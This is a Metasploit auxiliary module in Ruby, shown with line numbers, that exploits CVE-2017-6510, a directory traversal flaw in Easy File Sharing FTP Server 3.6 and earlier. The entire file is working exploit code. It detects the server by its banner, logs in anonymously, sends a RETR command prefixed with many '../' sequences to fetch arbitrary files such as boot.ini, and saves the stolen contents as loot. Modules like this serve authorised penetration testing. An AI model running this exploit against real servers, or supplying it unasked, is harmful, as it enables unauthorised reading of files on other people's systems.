Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Easy File Sharing FTP Server 3.6 Directory Traversal',
14
      'Description'    => %q{
15
        This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server Version 3.6 and Earlier.
16
        This vulnerability allows an attacker to download arbitrary files from the server by crafting
17
        a RETR command that includes file system traversal strings such as '../'
18
      },
19
      'Platform'       => 'win',
20
      'Author'         =>
21
        [
22
          'Ahmed Elhady Mohamed'   # @kingasmk ahmed.elhady.mohamed[at]gmail.com
23
        ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '2017-6510']
28
        ],
29
      'DisclosureDate' => '2017-03-07'
30
    ))
31

32
    register_options(
33
      [
34
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
35
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
36
      ])
37
  end
38

39
  def check_host(ip)
40
    begin
41
      connect
42
      if /Easy File Sharing FTP Server/i === banner
43
        return Exploit::CheckCode::Detected
44
      end
45
    ensure
46
      disconnect
47
    end
48

49
    Exploit::CheckCode::Safe
50
  end
51

52
  def run_host(target_host)
53
    begin
54
      # Login anonymously and open the socket that we'll use for data retrieval.
55
      connect_login
56
      sock = data_connect
57
      if sock.nil?
58
        error_msg = 'data_connect failed; possible invalid response'
59
        print_status(error_msg)
60
        elog(error_msg)
61
      else
62
        file_path = datastore['PATH']
63
        file = ::File.basename(file_path)
64

65
        # make RETR request and store server response message...
66
        retr_cmd = ( "../" * datastore['DEPTH'] ) + "#{file_path}"
67
        res = send_cmd( ["RETR", retr_cmd])
68

69
        # read the file data from the socket that we opened
70
        # dont assume theres still a sock to read from. Per #7582
71
        if sock.nil?
72
          error_msg = 'data_connect failed; possible invalid response'
73
          print_status(error_msg)
74
          elog(error_msg)
75
          return
76
        else
77
          # read the file data from the socket that we opened
78
          response_data = sock.read(1024)
79
        end
80

81
        unless response_data
82
          print_error("#{file_path} not found")
83
          return
84
        end
85

86
        if response_data.length == 0 or ! (res =~ /^150/ )
87
          print_status("File (#{file_path})from #{peer} is empty...")
88
          return
89
        end
90

91
        # store file data to loot
92
        loot_file = store_loot("easy.file.sharing.ftp.data", "text", rhost, response_data, file, file_path)
93
        vprint_status("Data returned:\n")
94
        vprint_line(response_data)
95
        print_good("Stored #{file_path} to #{loot_file}")
96
      end
97

98
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
99
      vprint_error(e.message)
100
      elog(e)
101
    rescue ::Timeout::Error, ::Errno::EPIPE => e
102
      vprint_error(e.message)
103
      elog(e)
104
    ensure
105
      data_disconnect
106
      disconnect
107
    end
108
  end
109
end
110

111